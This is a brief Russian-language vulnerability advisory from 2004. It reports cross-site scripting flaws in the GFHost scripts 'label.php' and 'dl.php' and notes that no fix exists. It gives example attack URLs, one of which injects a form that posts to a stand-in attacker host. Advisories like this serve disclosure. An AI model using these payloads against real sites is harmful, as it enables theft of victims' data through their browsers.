Дата публикации: | 09.11.2004 |
Всего просмотров: | 998 |
Опасность: | Низкая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: GFHost
Описание: Уязвимость существует при обработке входных данных в сценариях 'label.php' и 'dl.php'. Удаленный атакующий может специальным образом создать URL и выполнить произвольный HTML код в браузере жертвы. Примеры:
http://[target]/label.php?label=%3Cbody%3E%3Cform%20action=http://www.atacker.com/save.php%20 http://[target]/dl.php?a=0.1&OUR_FILE=ff24404eeac528b&f=file.php URL производителя: gfhost.googlemania.com/gfhost/ Решение: Решение не существует на данный момент. |
|
Ссылки: | Multiples XSS vulnerability in Gfhost |